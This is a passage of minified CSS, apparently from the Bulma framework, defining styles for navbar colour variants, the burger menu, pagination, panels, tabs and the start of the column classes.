.navbar-link:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-start .navbar-link:after,.navbar.is-dark .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand>.navbar-item,.navbar.is-primary .navbar-brand .navbar-link{color:#fff}.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-primary .navbar-start>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-end .navbar-link{color:#fff}.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary .navbar-start>a.navbar-item:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-start .navbar-link:after,.navbar.is-primary .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#485fc7;color:#fff}.navbar.is-link .navbar-brand>.navbar-item,.navbar.is-link .navbar-brand .navbar-link{color:#fff}.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-link .navbar-start>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-end .navbar-link{color:#fff}.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-start .navbar-link:after,.navbar.is-link .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#485fc7;color:#fff}}.navbar.is-info{background-color:#3e8ed0;color:#fff}.navbar.is-info .navbar-brand>.navbar-item,.navbar.is-info .navbar-brand .navbar-link{color:#fff}.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-info .navbar-start>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-end .navbar-link{color:#fff}.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start .navbar-link:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-start .navbar-link:after,.navbar.is-info .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-info .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3e8ed0;color:#fff}}.navbar.is-success{background-color:#48c78e;color:#fff}.navbar.is-success .navbar-brand>.navbar-item,.navbar.is-success .navbar-brand .navbar-link{color:#fff}.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-success .navbar-start>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-end .navbar-link{color:#fff}.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-start .navbar-link:after,.navbar.is-success .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-success .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c78e;color:#fff}}.navbar.is-warning{background-color:#ffe08a;color:#000000b3}.navbar.is-warning .navbar-brand>.navbar-item,.navbar.is-warning .navbar-brand .navbar-link{color:#000000b3}.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-warning .navbar-start>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-end .navbar-link{color:#000000b3}.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-start .navbar-link:after,.navbar.is-warning .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffe08a;color:#000000b3}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand>.navbar-item,.navbar.is-danger .navbar-brand .navbar-link{color:#fff}.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-danger .navbar-start>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-end .navbar-link{color:#fff}.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-start .navbar-link:after,.navbar.is-danger .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px #f5f5f5}.navbar.is-fixed-top{top:0}html.has-navbar-fixed-top,body.has-navbar-fixed-top{padding-top:3.25rem}html.has-navbar-fixed-bottom,body.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:#0000000d}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}a.navbar-item,.navbar-link{cursor:pointer}a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover,a.navbar-item.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,.navbar-link.is-active{background-color:#fafafa;color:#485fc7}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#485fc7}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#485fc7;border-bottom-style:solid;border-bottom-width:3px;color:#485fc7;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless):after{border-color:#485fc7;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width: 1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link:after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px #0a0a0a1a;padding:.5rem 0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}html.has-navbar-fixed-top-touch,body.has-navbar-fixed-top-touch{padding-top:3.25rem}html.has-navbar-fixed-bottom-touch,body.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width: 1024px){.navbar,.navbar-menu,.navbar-start,.navbar-end{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 2rem}.navbar.is-spaced .navbar-start,.navbar.is-spaced .navbar-end{align-items:center}.navbar.is-spaced a.navbar-item,.navbar.is-spaced .navbar-link{border-radius:4px}.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent .navbar-link.is-active{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link:after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px #0a0a0a1a;top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-hoverable:hover .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed{opacity:1;pointer-events:auto;transform:translateY(0)}.navbar-menu{flex-grow:1;flex-shrink:0}.navbar-start{justify-content:flex-start;margin-right:auto}.navbar-end{justify-content:flex-end;margin-left:auto}.navbar-dropdown{background-color:#fff;border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:2px solid #dbdbdb;box-shadow:0 8px 8px #0a0a0a1a;display:none;font-size:.875rem;left:0;min-width:100%;position:absolute;top:100%;z-index:20}.navbar-dropdown .navbar-item{padding:.375rem 1rem;white-space:nowrap}.navbar-dropdown a.navbar-item{padding-right:3rem}.navbar-dropdown a.navbar-item:focus,.navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#485fc7}.navbar.is-spaced .navbar-dropdown,.navbar-dropdown.is-boxed{border-radius:6px;border-top:none;box-shadow:0 8px 8px #0a0a0a1a,0 0 0 1px #0a0a0a1a;display:block;opacity:0;pointer-events:none;top:calc(100% - 4px);transform:translateY(-5px);transition-duration:86ms;transition-property:opacity,transform}.navbar-dropdown.is-right{left:auto;right:0}.navbar-divider{display:block}.navbar>.container .navbar-brand,.container>.navbar .navbar-brand{margin-left:-.75rem}.navbar>.container .navbar-menu,.container>.navbar .navbar-menu{margin-right:-.75rem}.navbar.is-fixed-bottom-desktop,.navbar.is-fixed-top-desktop{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-desktop{bottom:0}.navbar.is-fixed-bottom-desktop.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-desktop{top:0}html.has-navbar-fixed-top-desktop,body.has-navbar-fixed-top-desktop{padding-top:3.25rem}html.has-navbar-fixed-bottom-desktop,body.has-navbar-fixed-bottom-desktop{padding-bottom:3.25rem}html.has-spaced-navbar-fixed-top,body.has-spaced-navbar-fixed-top{padding-top:5.25rem}html.has-spaced-navbar-fixed-bottom,body.has-spaced-navbar-fixed-bottom{padding-bottom:5.25rem}a.navbar-item.is-active,.navbar-link.is-active{color:#0a0a0a}a.navbar-item.is-active:not(:focus):not(:hover),.navbar-link.is-active:not(:focus):not(:hover){background-color:transparent}.navbar-item.has-dropdown:focus .navbar-link,.navbar-item.has-dropdown:hover .navbar-link,.navbar-item.has-dropdown.is-active .navbar-link{background-color:#fafafa}}.hero.is-fullheight-with-navbar{min-height:calc(100vh - 3.25rem)}.pagination{font-size:1rem;margin:-.25rem}.pagination.is-small{font-size:.75rem}.pagination.is-medium{font-size:1.25rem}.pagination.is-large{font-size:1.5rem}.pagination.is-rounded .pagination-previous,.pagination.is-rounded .pagination-next{padding-left:1em;padding-right:1em;border-radius:9999px}.pagination.is-rounded .pagination-link{border-radius:9999px}.pagination,.pagination-list{align-items:center;display:flex;justify-content:center;text-align:center}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{font-size:1em;justify-content:center;margin:.25rem;padding-left:.5em;padding-right:.5em;text-align:center}.pagination-previous,.pagination-next,.pagination-link{border-color:#dbdbdb;color:#363636;min-width:2.5em}.pagination-previous:hover,.pagination-next:hover,.pagination-link:hover{border-color:#b5b5b5;color:#363636}.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus{border-color:#485fc7}.pagination-previous:active,.pagination-next:active,.pagination-link:active{box-shadow:inset 0 1px 2px #0a0a0a33}.pagination-previous[disabled],.pagination-previous.is-disabled,.pagination-next[disabled],.pagination-next.is-disabled,.pagination-link[disabled],.pagination-link.is-disabled{background-color:#dbdbdb;border-color:#dbdbdb;box-shadow:none;color:#7a7a7a;opacity:.5}.pagination-previous,.pagination-next{padding-left:.75em;padding-right:.75em;white-space:nowrap}.pagination-link.is-current{background-color:#485fc7;border-color:#485fc7;color:#fff}.pagination-ellipsis{color:#b5b5b5;pointer-events:none}.pagination-list{flex-wrap:wrap}.pagination-list li{list-style:none}@media screen and (max-width: 768px){.pagination{flex-wrap:wrap}.pagination-previous,.pagination-next,.pagination-list li{flex-grow:1;flex-shrink:1}}@media screen and (min-width: 769px),print{.pagination-list{flex-grow:1;flex-shrink:1;justify-content:flex-start;order:1}.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{margin-bottom:0;margin-top:0}.pagination-previous{order:2}.pagination-next{order:3}.pagination{justify-content:space-between;margin-bottom:0;margin-top:0}.pagination.is-centered .pagination-previous{order:1}.pagination.is-centered .pagination-list{justify-content:center;order:2}.pagination.is-centered .pagination-next{order:3}.pagination.is-right .pagination-previous{order:1}.pagination.is-right .pagination-next{order:2}.pagination.is-right .pagination-list{justify-content:flex-end;order:3}}.panel{border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;font-size:1rem}.panel:not(:last-child){margin-bottom:1.5rem}.panel.is-white .panel-heading{background-color:#fff;color:#0a0a0a}.panel.is-white .panel-tabs a.is-active{border-bottom-color:#fff}.panel.is-white .panel-block.is-active .panel-icon{color:#fff}.panel.is-black .panel-heading{background-color:#0a0a0a;color:#fff}.panel.is-black .panel-tabs a.is-active{border-bottom-color:#0a0a0a}.panel.is-black .panel-block.is-active .panel-icon{color:#0a0a0a}.panel.is-light .panel-heading{background-color:#f5f5f5;color:#000000b3}.panel.is-light .panel-tabs a.is-active{border-bottom-color:#f5f5f5}.panel.is-light .panel-block.is-active .panel-icon{color:#f5f5f5}.panel.is-dark .panel-heading{background-color:#363636;color:#fff}.panel.is-dark .panel-tabs a.is-active{border-bottom-color:#363636}.panel.is-dark .panel-block.is-active .panel-icon{color:#363636}.panel.is-primary .panel-heading{background-color:#00d1b2;color:#fff}.panel.is-primary .panel-tabs a.is-active{border-bottom-color:#00d1b2}.panel.is-primary .panel-block.is-active .panel-icon{color:#00d1b2}.panel.is-link .panel-heading{background-color:#485fc7;color:#fff}.panel.is-link .panel-tabs a.is-active{border-bottom-color:#485fc7}.panel.is-link .panel-block.is-active .panel-icon{color:#485fc7}.panel.is-info .panel-heading{background-color:#3e8ed0;color:#fff}.panel.is-info .panel-tabs a.is-active{border-bottom-color:#3e8ed0}.panel.is-info .panel-block.is-active .panel-icon{color:#3e8ed0}.panel.is-success .panel-heading{background-color:#48c78e;color:#fff}.panel.is-success .panel-tabs a.is-active{border-bottom-color:#48c78e}.panel.is-success .panel-block.is-active .panel-icon{color:#48c78e}.panel.is-warning .panel-heading{background-color:#ffe08a;color:#000000b3}.panel.is-warning .panel-tabs a.is-active{border-bottom-color:#ffe08a}.panel.is-warning .panel-block.is-active .panel-icon{color:#ffe08a}.panel.is-danger .panel-heading{background-color:#f14668;color:#fff}.panel.is-danger .panel-tabs a.is-active{border-bottom-color:#f14668}.panel.is-danger .panel-block.is-active .panel-icon{color:#f14668}.panel-tabs:not(:last-child),.panel-block:not(:last-child){border-bottom:1px solid #ededed}.panel-heading{background-color:#ededed;border-radius:6px 6px 0 0;color:#363636;font-size:1.25em;font-weight:700;line-height:1.25;padding:.75em 1em}.panel-tabs{align-items:flex-end;display:flex;font-size:.875em;justify-content:center}.panel-tabs a{border-bottom:1px solid #dbdbdb;margin-bottom:-1px;padding:.5em}.panel-tabs a.is-active{border-bottom-color:#4a4a4a;color:#363636}.panel-list a{color:#4a4a4a}.panel-list a:hover{color:#485fc7}.panel-block{align-items:center;color:#363636;display:flex;justify-content:flex-start;padding:.5em .75em}.panel-block input[type=checkbox]{margin-right:.75em}.panel-block>.control{flex-grow:1;flex-shrink:1;width:100%}.panel-block.is-wrapped{flex-wrap:wrap}.panel-block.is-active{border-left-color:#485fc7;color:#363636}.panel-block.is-active .panel-icon{color:#485fc7}.panel-block:last-child{border-bottom-left-radius:6px;border-bottom-right-radius:6px}a.panel-block,label.panel-block{cursor:pointer}a.panel-block:hover,label.panel-block:hover{background-color:#f5f5f5}.panel-icon{display:inline-block;font-size:14px;height:1em;line-height:1em;text-align:center;vertical-align:top;width:1em;color:#7a7a7a;margin-right:.75em}.panel-icon .fa{font-size:inherit;line-height:inherit}.tabs{-webkit-overflow-scrolling:touch;align-items:stretch;display:flex;font-size:1rem;justify-content:space-between;overflow:hidden;overflow-x:auto;white-space:nowrap}.tabs a{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;color:#4a4a4a;display:flex;justify-content:center;margin-bottom:-1px;padding:.5em 1em;vertical-align:top}.tabs a:hover{border-bottom-color:#363636;color:#363636}.tabs li{display:block}.tabs li.is-active a{border-bottom-color:#485fc7;color:#485fc7}.tabs ul{align-items:center;border-bottom-color:#dbdbdb;border-bottom-style:solid;border-bottom-width:1px;display:flex;flex-grow:1;flex-shrink:0;justify-content:flex-start}.tabs ul.is-left{padding-right:.75em}.tabs ul.is-center{flex:none;justify-content:center;padding-left:.75em;padding-right:.75em}.tabs ul.is-right{justify-content:flex-end;padding-left:.75em}.tabs .icon:first-child{margin-right:.5em}.tabs .icon:last-child{margin-left:.5em}.tabs.is-centered ul{justify-content:center}.tabs.is-right ul{justify-content:flex-end}.tabs.is-boxed a{border:1px solid transparent;border-radius:4px 4px 0 0}.tabs.is-boxed a:hover{background-color:#f5f5f5;border-bottom-color:#dbdbdb}.tabs.is-boxed li.is-active a{background-color:#fff;border-color:#dbdbdb;border-bottom-color:transparent!important}.tabs.is-fullwidth li{flex-grow:1;flex-shrink:0}.tabs.is-toggle a{border-color:#dbdbdb;border-style:solid;border-width:1px;margin-bottom:0;position:relative}.tabs.is-toggle a:hover{background-color:#f5f5f5;border-color:#b5b5b5;z-index:2}.tabs.is-toggle li+li{margin-left:-1px}.tabs.is-toggle li:first-child a{border-top-left-radius:4px;border-bottom-left-radius:4px}.tabs.is-toggle li:last-child a{border-top-right-radius:4px;border-bottom-right-radius:4px}.tabs.is-toggle li.is-active a{background-color:#485fc7;border-color:#485fc7;color:#fff;z-index:1}.tabs.is-toggle ul{border-bottom:none}.tabs.is-toggle.is-toggle-rounded li:first-child a{border-bottom-left-radius:9999px;border-top-left-radius:9999px;padding-left:1.25em}.tabs.is-toggle.is-toggle-rounded li:last-child a{border-bottom-right-radius:9999px;border-top-right-radius:9999px;padding-right:1.25em}.tabs.is-small{font-size:.75rem}.tabs.is-medium{font-size:1.25rem}.tabs.is-large{font-size:1.5rem}.column{display:block;flex-basis:0;flex-grow:1;flex-shrink:1;padding:.75rem}.columns.is-mobile>.column.is-narrow{flex:none;width:unset}.columns.is-mobile>.column.is-full{flex:none;width:100%}.columns.is-mobile>.column.is-three-quarters{flex:none;width:75%}.columns.is-mobile>.column.is-two-thirds{flex:none;width:66.6666%}.columns.is-mobile>.column.is-half{flex:none;width:50%}.columns.is-mobile>.column.is-one-third{flex:none;width:33.3333%}.columns.is-mobile>.column.is-one-quarter{flex:none;width:25%}.columns.is-mobile>.column.is-one-fifth{flex:none;width:20%}.columns.is-mobile>.column.is-two-fifths{flex:none;width:40%}.columns.is-mobile>.column.is-three-fifths{flex:none;width:60%}.columns.is-mobile>.column.is-four-fifths{flex:none;width:80%}.columns.is-mobile>.column.is-offset-three-quarters{margin-left:75%}.columns.is-mobile>.column.is-o